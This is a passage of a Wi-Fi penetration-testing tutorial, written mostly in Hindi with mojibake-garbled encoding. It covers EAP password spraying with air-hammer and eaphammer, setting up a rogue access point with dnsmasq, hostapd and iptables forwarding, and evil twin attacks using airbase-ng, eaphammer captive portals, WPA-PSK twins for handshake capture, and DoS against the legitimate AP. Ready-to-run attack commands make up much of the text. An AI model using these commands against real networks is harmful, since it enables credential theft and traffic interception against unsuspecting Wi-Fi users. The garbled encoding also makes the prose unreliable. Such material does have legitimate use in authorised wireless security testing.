рд╕реБрд░рдХреНрд╖рд┐рдд рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╡рд┐рдзрд┐ EAP рд╣реИ, рд╡рд╣рд╛рдВ рдЖрдВрддрд░рд┐рдХ EAP рд╕рдВрджреЗрд╢реЛрдВ рдХреЛ рдмрд┐рдирд╛ EAP-PEAP рдпрд╛ EAP-TTLS рдЖрд╡рд░рдг рдХреЗ рд╣реЛрдо RADIUS рд╕рд░реНрд╡рд░ рдХреЛ рднреЗрдЬрд╛ рдЬрд╛рддрд╛ рд╣реИред рдЖрдЙрдЯрдЧреЛрдЗрдВрдЧ RADIUS рд╕рдВрджреЗрд╢ рдХреА User-Name рд╡рд┐рд╢реЗрд╖рддрд╛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреА рд╡рд╛рд╕реНрддрд╡рд┐рдХ рдкрд╣рдЪрд╛рди рдХреЛ рд╢рд╛рдорд┐рд▓ рдХрд░рддреА рд╣реИ, рдЬреЛ рдЖрдиреЗ рд╡рд╛рд▓реЗ RADIUS рдЕрдиреБрд░реЛрдз рд╕реЗ рдЕрдирд╛рдо User-Name рдХреЛ рдкреНрд░рддрд┐рд╕реНрдерд╛рдкрд┐рдд рдХрд░рддреА рд╣реИред рдЬрдм рд╕реБрд░рдХреНрд╖рд┐рдд рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╡рд┐рдзрд┐ PAP рдпрд╛ CHAP (рдЬреЛ рдХреЗрд╡рд▓ TTLS рджреНрд╡рд╛рд░рд╛ рд╕рдорд░реНрдерд┐рдд рд╣реИ) рд╣реЛрддреА рд╣реИ, рддреЛ рдЖрдЙрдЯрдЧреЛрдЗрдВрдЧ RADIUS рд╕рдВрджреЗрд╢ рдореЗрдВ TLS рдкреЗрд▓реЛрдб рд╕реЗ рдирд┐рдХрд╛рд▓реА рдЧрдИ User-Name рдФрд░ рдЕрдиреНрдп рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╡рд┐рд╢реЗрд╖рддрд╛рдУрдВ рдХреЛ рдЕрдирд╛рдо User-Name рдФрд░ рдЖрдиреЗ рд╡рд╛рд▓реЗ RADIUS рдЕрдиреБрд░реЛрдз рдореЗрдВ рдкрд╛рдП рдЧрдП TTLS EAP-Message рд╡рд┐рд╢реЗрд╖рддрд╛рдУрдВ рдХреЛ рдкреНрд░рддрд┐рд╕реНрдерд╛рдкрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред

рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рд▓рд┐рдП рджреЗрдЦреЗрдВ https://www.interlinknetworks.com/app_notes/eap-peap.htm

EAP-Bruteforce (password spray)

рдпрджрд┐ рдХреНрд▓рд╛рдЗрдВрдЯ рд╕реЗ username рдФрд░ password рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреА рдЕрдкреЗрдХреНрд╖рд╛ рдХреА рдЬрд╛рддреА рд╣реИ (рдзреНрдпрд╛рди рджреЗрдВ рдХрд┐ рдЗрд╕ рдорд╛рдорд▓реЗ рдореЗрдВ EAP-TLS рдорд╛рдиреНрдп рдирд╣реАрдВ рд╣реЛрдЧрд╛), рддреЛ рдЖрдк usernames (рдЕрдЧрд▓реЗ рднрд╛рдЧ рдХреЛ рджреЗрдЦреЗрдВ) рдФрд░ passwords рдХреА рдПрдХ рд╕реВрдЪреА рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ bruteforce рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХреНрд╕реЗрд╕ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ air-hammer.

./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

рдЖрдк рдЗрд╕ рд╣рдорд▓реЗ рдХреЛ eaphammer рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рднреА рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

Client attacks Theory

Network Selection and Roaming

  • 802.11 рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдпрд╣ рдкрд░рд┐рднрд╛рд╖рд┐рдд рдХрд░рддрд╛ рд╣реИ рдХрд┐ рдПрдХ рд╕реНрдЯреЗрд╢рди рдПрдХ рд╡рд┐рд╕реНрддрд╛рд░рд┐рдд рд╕реЗрд╡рд╛ рд╕реЗрдЯ (ESS) рдореЗрдВ рдХреИрд╕реЗ рд╢рд╛рдорд┐рд▓ рд╣реЛрддрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рдпрд╣ ESS рдпрд╛ рдЗрд╕рдХреЗ рднреАрддрд░ рдПрдХ рдПрдХреНрд╕реЗрд╕ рдкреЙрдЗрдВрдЯ (AP) рдХрд╛ рдЪрдпрди рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдорд╛рдирджрдВрдб рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдирд╣реАрдВ рдХрд░рддрд╛ рд╣реИред

  • рд╕реНрдЯреЗрд╢рди рдПрдХ рд╣реА ESSID рд╕рд╛рдЭрд╛ рдХрд░рдиреЗ рд╡рд╛рд▓реЗ APs рдХреЗ рдмреАрдЪ рдШреВрдо рд╕рдХрддреЗ рд╣реИрдВ, рдПрдХ рднрд╡рди рдпрд╛ рдХреНрд╖реЗрддреНрд░ рдореЗрдВ рдХрдиреЗрдХреНрдЯрд┐рд╡рд┐рдЯреА рдмрдирд╛рдП рд░рдЦрддреЗ рд╣реБрдПред

  • рдкреНрд░реЛрдЯреЛрдХреЙрд▓ ESS рдХреЗ рд▓рд┐рдП рд╕реНрдЯреЗрд╢рди рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдХрд░рддрд╛ рд╣реИ рд▓реЗрдХрд┐рди рд╕реНрдЯреЗрд╢рди рдХреЗ рд▓рд┐рдП AP рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдЕрдирд┐рд╡рд╛рд░реНрдп рдирд╣реАрдВ рдХрд░рддрд╛ рд╣реИред

Preferred Network Lists (PNLs)

  • рд╕реНрдЯреЗрд╢рди рдЕрдкрдиреЗ рдкрд╕рдВрджреАрджрд╛ рдиреЗрдЯрд╡рд░реНрдХ рд╕реВрдЪреА (PNL) рдореЗрдВ рд╣рд░ рд╡рд╛рдпрд░рд▓реЗрд╕ рдиреЗрдЯрд╡рд░реНрдХ рдХреЗ ESSID рдХреЛ рд╕рдВрдЧреНрд░рд╣реАрдд рдХрд░рддреЗ рд╣реИрдВ, рдЬрд┐рд╕рдореЗрдВ рдиреЗрдЯрд╡рд░реНрдХ-рд╡рд┐рд╢рд┐рд╖реНрдЯ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рд╡рд┐рд╡рд░рдг рднреА рд╣реЛрддреЗ рд╣реИрдВред

  • PNL рдХрд╛ рдЙрдкрдпреЛрдЧ рдЬреНрдЮрд╛рдд рдиреЗрдЯрд╡рд░реНрдХ рд╕реЗ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдЬрд┐рд╕рд╕реЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рдЕрдиреБрднрд╡ рдореЗрдВ рд╕реБрдзрд╛рд░ рд╣реЛрддрд╛ рд╣реИ рдФрд░ рдХрдиреЗрдХреНрд╢рди рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЛ рд╕рд░рд▓ рдмрдирд╛рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред

Passive Scanning

  • APs рд╕рдордп-рд╕рдордп рдкрд░ рдмреАрдХрди рдлрд╝реНрд░реЗрдо рдкреНрд░рд╕рд╛рд░рд┐рдд рдХрд░рддреЗ рд╣реИрдВ, рдЕрдкрдиреА рдЙрдкрд╕реНрдерд┐рддрд┐ рдФрд░ рд╡рд┐рд╢реЗрд╖рддрд╛рдУрдВ рдХреА рдШреЛрд╖рдгрд╛ рдХрд░рддреЗ рд╣реИрдВ, рдЬрд┐рд╕рдореЗрдВ AP рдХрд╛ ESSID рд╢рд╛рдорд┐рд▓ рд╣реЛрддрд╛ рд╣реИ рдЬрдм рддрдХ рдХрд┐ рдкреНрд░рд╕рд╛рд░рдг рдмрдВрдж рди рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реЛред

  • рдкреИрд╕рд┐рд╡ рд╕реНрдХреИрдирд┐рдВрдЧ рдХреЗ рджреМрд░рд╛рди, рд╕реНрдЯреЗрд╢рди рдмреАрдХрди рдлрд╝реНрд░реЗрдо рд╕реБрдирддреЗ рд╣реИрдВред рдпрджрд┐ рдХрд┐рд╕реА рдмреАрдХрди рдХрд╛ ESSID рд╕реНрдЯреЗрд╢рди рдХреЗ PNL рдореЗрдВ рдПрдХ рдкреНрд░рд╡рд┐рд╖реНрдЯрд┐ рд╕реЗ рдореЗрд▓ рдЦрд╛рддрд╛ рд╣реИ, рддреЛ рд╕реНрдЯреЗрд╢рди рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рдЙрд╕ AP рд╕реЗ рдХрдиреЗрдХреНрдЯ рд╣реЛ рд╕рдХрддрд╛ рд╣реИред

  • рдПрдХ рдбрд┐рд╡рд╛рдЗрд╕ рдХреЗ PNL рдХрд╛ рдЬреНрдЮрд╛рди рд╕рдВрднрд╛рд╡рд┐рдд рд╢реЛрд╖рдг рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ, рдПрдХ рдЬреНрдЮрд╛рдд рдиреЗрдЯрд╡рд░реНрдХ рдХреЗ ESSID рдХреА рдирдХрд▓ рдХрд░рдХреЗ, рдбрд┐рд╡рд╛рдЗрд╕ рдХреЛ рдПрдХ рдзреЛрдЦрд╛рдзрдбрд╝реА AP рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдзреЛрдЦрд╛ рджреЗрдирд╛ред

Active Probing

  • рд╕рдХреНрд░рд┐рдп рдкреНрд░реЛрдмрд┐рдВрдЧ рдореЗрдВ рд╕реНрдЯреЗрд╢рди рдкрд╛рд╕ рдХреЗ APs рдФрд░ рдЙрдирдХреА рд╡рд┐рд╢реЗрд╖рддрд╛рдУрдВ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдкреНрд░реЛрдм рдЕрдиреБрд░реЛрдз рднреЗрдЬрддреЗ рд╣реИрдВред

  • рдирд┐рд░реНрджреЗрд╢рд┐рдд рдкреНрд░реЛрдм рдЕрдиреБрд░реЛрдз рдПрдХ рд╡рд┐рд╢рд┐рд╖реНрдЯ ESSID рдХреЛ рд▓рдХреНрд╖рд┐рдд рдХрд░рддреЗ рд╣реИрдВ, рдпрд╣ рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рдореЗрдВ рдорджрдж рдХрд░рддреЗ рд╣реИрдВ рдХрд┐ рдХреНрдпрд╛ рдХреЛрдИ рд╡рд┐рд╢реЗрд╖ рдиреЗрдЯрд╡рд░реНрдХ рд░реЗрдВрдЬ рдореЗрдВ рд╣реИ, рднрд▓реЗ рд╣реА рдпрд╣ рдПрдХ рдЫрд┐рдкрд╛ рд╣реБрдЖ рдиреЗрдЯрд╡рд░реНрдХ рд╣реЛред

  • рдкреНрд░рд╕рд╛рд░рдг рдкреНрд░реЛрдм рдЕрдиреБрд░реЛрдз рдореЗрдВ рдПрдХ рд╢реВрдиреНрдп SSID рдлрд╝реАрд▓реНрдб рд╣реЛрддреА рд╣реИ рдФрд░ рдЗрдиреНрд╣реЗрдВ рд╕рднреА рдирдЬрджреАрдХреА APs рдХреЛ рднреЗрдЬрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдЬрд┐рд╕рд╕реЗ рд╕реНрдЯреЗрд╢рди рдмрд┐рдирд╛ рдЕрдкрдиреЗ PNL рд╕рд╛рдордЧреНрд░реА рдХрд╛ рдЦреБрд▓рд╛рд╕рд╛ рдХрд┐рдП рдХрд┐рд╕реА рднреА рдкрд╕рдВрджреАрджрд╛ рдиреЗрдЯрд╡рд░реНрдХ рдХреА рдЬрд╛рдВрдЪ рдХрд░ рд╕рдХрддрд╛ рд╣реИред

Simple AP with redirection to Internet

рдЬрдЯрд┐рд▓ рд╣рдорд▓реЛрдВ рдХреЛ рдХрд░рдиреЗ рдХреЗ рддрд░реАрдХреЗ рдХреЛ рд╕рдордЭрд╛рдиреЗ рд╕реЗ рдкрд╣рд▓реЗ рдпрд╣ рд╕рдордЭрд╛рдпрд╛ рдЬрд╛рдПрдЧрд╛ рдХреИрд╕реЗ рдХреЗрд╡рд▓ рдПрдХ AP рдмрдирд╛рдПрдВ рдФрд░ рдЗрд╕рдХреЗ рдЯреНрд░реИрдлрд╝рд┐рдХ рдХреЛ рдЗрдВрдЯрд░рдиреЗрдЯ рд╕реЗ рдЬреБрдбрд╝реЗ рдЗрдВрдЯрд░рдлреЗрд╕ рдкрд░ рд░реАрдбрд╛рдпрд░реЗрдХреНрдЯ рдХрд░реЗрдВред

ifconfig -a рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЬрд╛рдВрдЪреЗрдВ рдХрд┐ AP рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП wlan рдЗрдВрдЯрд░рдлреЗрд╕ рдФрд░ рдЗрдВрдЯрд░рдиреЗрдЯ рд╕реЗ рдЬреБрдбрд╝реЗ рдЗрдВрдЯрд░рдлреЗрд╕ рдореМрдЬреВрдж рд╣реИрдВред

DHCP & DNS

apt-get install dnsmasq #Manages DHCP and DNS

/etc/dnsmasq.conf рдлрд╝рд╛рдЗрд▓ рдмрдирд╛рдПрдБ:

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

рдлрд┐рд░ IP рдФрд░ routes рд╕реЗрдЯ рдХрд░реЗрдВ:

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

рдФрд░ рдлрд┐рд░ рд╢реБрд░реВ рдХрд░реЗрдВ dnsmasq:

dnsmasq -C dnsmasq.conf -d

hostapd

apt-get install hostapd

hostapd.conf рдлрд╝рд╛рдЗрд▓ рдмрдирд╛рдПрдБ:

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

рдирд┐рд░рд╛рд╢рд╛рдЬрдирдХ рдкреНрд░рдХреНрд░рд┐рдпрд╛рдПрдБ рдмрдВрдж рдХрд░реЗрдВ, рдореЙрдирд┐рдЯрд░ рдореЛрдб рд╕реЗрдЯ рдХрд░реЗрдВ, рдФрд░ hostapd рд╢реБрд░реВ рдХрд░реЗрдВ:

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

рдлреЙрд░рд╡рд░реНрдбрд┐рдВрдЧ рдФрд░ рд░реАрдбрд╛рдпрд░реЗрдХреНрд╢рди

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Evil Twin

рдПрдХ рдИрд╡рд┐рд▓ рдЯреНрд╡рд┐рди рд╣рдорд▓рд╛ рд╡рд╛рдИрдлрд╛рдИ рдХреНрд▓рд╛рдЗрдВрдЯреНрд╕ рджреНрд╡рд╛рд░рд╛ рдиреЗрдЯрд╡рд░реНрдХреЛрдВ рдХреЛ рдкрд╣рдЪрд╛рдирдиреЗ рдХреЗ рддрд░реАрдХреЗ рдХрд╛ рд▓рд╛рдн рдЙрдард╛рддрд╛ рд╣реИ, рдЬреЛ рдореБрдЦреНрдп рд░реВрдк рд╕реЗ рдиреЗрдЯрд╡рд░реНрдХ рдирд╛рдо (ESSID) рдкрд░ рдирд┐рд░реНрднрд░ рдХрд░рддрд╛ рд╣реИ рдмрд┐рдирд╛ рдмреЗрд╕ рд╕реНрдЯреЗрд╢рди (рдПрдХреНрд╕реЗрд╕ рдкреЙрдЗрдВрдЯ) рдХреЛ рдХреНрд▓рд╛рдЗрдВрдЯ рдХреЗ рд▓рд┐рдП рдЦреБрдж рдХреЛ рдкреНрд░рдорд╛рдгрд┐рдд рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдХреЗред рдореБрдЦреНрдп рдмрд┐рдВрджреБ рд╢рд╛рдорд┐рд▓ рд╣реИрдВ:

  • рднреЗрджрднрд╛рд╡ рдореЗрдВ рдХрдард┐рдирд╛рдИ: рдЙрдкрдХрд░рдгреЛрдВ рдХреЗ рд▓рд┐рдП рд╡реИрдз рдФрд░ рдзреЛрдЦрд╛рдзрдбрд╝реА рдПрдХреНрд╕реЗрд╕ рдкреЙрдЗрдВрдЯреНрд╕ рдХреЗ рдмреАрдЪ рдЕрдВрддрд░ рдХрд░рдирд╛ рдореБрд╢реНрдХрд┐рд▓ рд╣реЛрддрд╛ рд╣реИ рдЬрдм рд╡реЗ рд╕рдорд╛рди ESSID рдФрд░ рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдкреНрд░рдХрд╛рд░ рд╕рд╛рдЭрд╛ рдХрд░рддреЗ рд╣реИрдВред рд╡рд╛рд╕реНрддрд╡рд┐рдХ рджреБрдирд┐рдпрд╛ рдХреЗ рдиреЗрдЯрд╡рд░реНрдХ рдЕрдХреНрд╕рд░ рдХрд╡рд░реЗрдЬ рдХреЛ рдирд┐рд░реНрдмрд╛рдз рд░реВрдк рд╕реЗ рдмрдврд╝рд╛рдиреЗ рдХреЗ рд▓рд┐рдП рд╕рдорд╛рди ESSID рдХреЗ рд╕рд╛рде рдХрдИ рдПрдХреНрд╕реЗрд╕ рдкреЙрдЗрдВрдЯреНрд╕ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВред

  • рдХреНрд▓рд╛рдЗрдВрдЯ рд░реЛрдорд┐рдВрдЧ рдФрд░ рдХрдиреЗрдХреНрд╢рди рд╣реЗрд░рдлреЗрд░: 802.11 рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдЙрдкрдХрд░рдгреЛрдВ рдХреЛ рдПрдХ рд╣реА ESS рдХреЗ рднреАрддрд░ рдПрдХреНрд╕реЗрд╕ рдкреЙрдЗрдВрдЯреНрд╕ рдХреЗ рдмреАрдЪ рдШреВрдордиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред рд╣рдорд▓рд╛рд╡рд░ рдЗрд╕ рдмрд╛рдд рдХрд╛ рд▓рд╛рдн рдЙрдард╛ рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ рд╡реЗ рдПрдХ рдЙрдкрдХрд░рдг рдХреЛ рдЙрд╕рдХреЗ рд╡рд░реНрддрдорд╛рди рдмреЗрд╕ рд╕реНрдЯреЗрд╢рди рд╕реЗ рдбрд┐рд╕реНрдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдФрд░ рдПрдХ рдзреЛрдЦрд╛рдзрдбрд╝реА рд╡рд╛рд▓реЗ рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд▓реБрднрд╛ рд╕рдХрддреЗ рд╣реИрдВред рдпрд╣ рдПрдХ рдордЬрдмреВрдд рд╕рд┐рдЧреНрдирд▓ рдкреНрд░рджрд╛рди рдХрд░рдХреЗ рдпрд╛ рд╡реИрдз рдПрдХреНрд╕реЗрд╕ рдкреЙрдЗрдВрдЯ рдХреЗ рд╕рд╛рде рдХрдиреЗрдХреНрд╢рди рдХреЛ рдмрд╛рдзрд┐рдд рдХрд░рдХреЗ рдЬреИрд╕реЗ рдХрд┐ рдбрд┐рдЕрдереЗрдВрдЯрд┐рдХреЗрд╢рди рдкреИрдХреЗрдЯреНрд╕ рдпрд╛ рдЬреИрдорд┐рдВрдЧ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред

  • рдХрд╛рд░реНрдпрдиреНрд╡рдпрди рдореЗрдВ рдЪреБрдиреМрддрд┐рдпрд╛рдБ: рдХрдИ, рдЕрдЪреНрдЫреА рддрд░рд╣ рд╕реЗ рд░рдЦреЗ рдЧрдП рдПрдХреНрд╕реЗрд╕ рдкреЙрдЗрдВрдЯреНрд╕ рд╡рд╛рд▓реЗ рд╡рд╛рддрд╛рд╡рд░рдг рдореЗрдВ рдИрд╡рд┐рд▓ рдЯреНрд╡рд┐рди рд╣рдорд▓реЗ рдХреЛ рд╕рдлрд▓рддрд╛рдкреВрд░реНрд╡рдХ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░рдирд╛ рдЪреБрдиреМрддреАрдкреВрд░реНрдг рд╣реЛ рд╕рдХрддрд╛ рд╣реИред рдПрдХрд▓ рд╡реИрдз рдПрдХреНрд╕реЗрд╕ рдкреЙрдЗрдВрдЯ рдХреЛ рдбрд┐рдЕрдереЗрдВрдЯрд┐рдХреЗрдЯ рдХрд░рдиреЗ рд╕реЗ рдЕрдХреНрд╕рд░ рдЙрдкрдХрд░рдг рдХреЛ рдПрдХ рдЕрдиреНрдп рд╡реИрдз рдПрдХреНрд╕реЗрд╕ рдкреЙрдЗрдВрдЯ рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХрд╛ рдкрд░рд┐рдгрд╛рдо рд╣реЛрддрд╛ рд╣реИ рдЬрдм рддрдХ рдХрд┐ рд╣рдорд▓рд╛рд╡рд░ рд╕рднреА рдирд┐рдХрдЯрд╡рд░реНрддреА рдПрдХреНрд╕реЗрд╕ рдкреЙрдЗрдВрдЯреНрд╕ рдХреЛ рдбрд┐рдЕрдереЗрдВрдЯрд┐рдХреЗрдЯ рдирд╣реАрдВ рдХрд░ рд╕рдХрддрд╛ рдпрд╛ рдзреЛрдЦрд╛рдзрдбрд╝реА рд╡рд╛рд▓реЗ рдПрдХреНрд╕реЗрд╕ рдкреЙрдЗрдВрдЯ рдХреЛ рд░рдгрдиреАрддрд┐рдХ рд░реВрдк рд╕реЗ рдирд╣реАрдВ рд░рдЦ рд╕рдХрддрд╛ред

рдЖрдк рдПрдХ рдмрд╣реБрдд рдмреБрдирд┐рдпрд╛рджреА рдУрдкрди рдИрд╡рд┐рд▓ рдЯреНрд╡рд┐рди (рдЗрдВрдЯрд░рдиреЗрдЯ рдкрд░ рдЯреНрд░реИрдлрд╝рд┐рдХ рд░реВрдЯ рдХрд░рдиреЗ рдХреА рдХреНрд╖рдорддрд╛рдУрдВ рдХреЗ рдмрд┐рдирд╛) рдмрдирд╛ рд╕рдХрддреЗ рд╣реИрдВ:

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

рдЖрдк eaphammer рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ Evil Twin рднреА рдмрдирд╛ рд╕рдХрддреЗ рд╣реИрдВ (рдзреНрдпрд╛рди рджреЗрдВ рдХрд┐ eaphammer рдХреЗ рд╕рд╛рде evil twins рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдЗрдВрдЯрд░рдлреЗрд╕ monitor рдореЛрдб рдореЗрдВ рдирд╣реАрдВ рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдП):

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

Or using Airgeddon: Options: 5,6,7,8,9 (inside Evil Twin attack menu).

рдХреГрдкрдпрд╛ рдзреНрдпрд╛рди рджреЗрдВ рдХрд┐ рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд░реВрдк рд╕реЗ рдпрджрд┐ PNL рдореЗрдВ рдПрдХ ESSID WPA рд╕реБрд░рдХреНрд╖рд┐рдд рдХреЗ рд░реВрдк рдореЗрдВ рд╕рд╣реЗрдЬрд╛ рдЧрдпрд╛ рд╣реИ, рддреЛ рдбрд┐рд╡рд╛рдЗрд╕ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рдПрдХ рдУрдкрди рдИрд╡рд┐рд▓ рдЯреНрд╡рд┐рди рд╕реЗ рдХрдиреЗрдХреНрдЯ рдирд╣реАрдВ рд╣реЛрдЧрд╛ред рдЖрдк рдЕрд╕рд▓реА AP рдкрд░ DoS рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЖрд╢рд╛ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдореИрдиреНрдпреБрдЕрд▓ рд░реВрдк рд╕реЗ рдЖрдкрдХреЗ рдУрдкрди рдИрд╡рд┐рд▓ рдЯреНрд╡рд┐рди рд╕реЗ рдХрдиреЗрдХреНрдЯ рд╣реЛрдЧрд╛, рдпрд╛ рдЖрдк рдЕрд╕рд▓реА AP рдкрд░ DoS рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рд╣реИрдВрдбрд╢реЗрдХ рдХреИрдкреНрдЪрд░ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП WPA рдИрд╡рд┐рд▓ рдЯреНрд╡рд┐рди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ (рдЗрд╕ рд╡рд┐рдзрд┐ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╕рдордп рдЖрдк рдкреАрдПрд╕рдХреЗ рдирд╣реАрдВ рдЬрд╛рдирддреЗ рд╣реИрдВ, рдЗрд╕рд▓рд┐рдП рдЖрдк рдкреАрдбрд╝рд┐рдд рдХреЛ рдЕрдкрдиреЗ рд╕рд╛рде рдХрдиреЗрдХреНрдЯ рдирд╣реАрдВ рдХрд░рд╡рд╛ рд╕рдХрддреЗ, рд▓реЗрдХрд┐рди рдЖрдк рд╣реИрдВрдбрд╢реЗрдХ рдХреИрдкреНрдЪрд░ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЗрд╕реЗ рдХреНрд░реИрдХ рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ)ред

рдХреБрдЫ OS рдФрд░ AV рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рдЪреЗрддрд╛рд╡рдиреА рджреЗрдВрдЧреЗ рдХрд┐ рдУрдкрди рдиреЗрдЯрд╡рд░реНрдХ рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдирд╛ рдЦрддрд░рдирд╛рдХ рд╣реИ...

WPA/WPA2 Evil Twin

рдЖрдк WPA/2 рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ Evil Twin рдмрдирд╛ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдпрджрд┐ рдбрд┐рд╡рд╛рдЗрд╕ рдЙрд╕ SSID рд╕реЗ WPA/2 рдХреЗ рд╕рд╛рде рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд┐рдП рдЧрдП рд╣реИрдВ, рддреЛ рд╡реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░реЗрдВрдЧреЗред рдХрд┐рд╕реА рднреА рддрд░рд╣, 4-way-handshake рдХреЛ рдкреВрд░рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрдкрдХреЛ рдЬрд╛рдирдирд╛ рд╣реЛрдЧрд╛ рдХрд┐ рдХреНрд▓рд╛рдЗрдВрдЯ рдХреМрди рд╕рд╛ рдкрд╛рд╕рд╡рд░реНрдб рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдЬрд╛ рд░рд╣рд╛ рд╣реИред рдпрджрд┐ рдЖрдк рдирд╣реАрдВ рдЬрд╛рдирддреЗ рд╣реИрдВ, рддреЛ рдХрдиреЗрдХреНрд╢рди рдкреВрд░рд╛ рдирд╣реАрдВ рд╣реЛрдЧрд╛ред

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

Enterprise Evil Twin

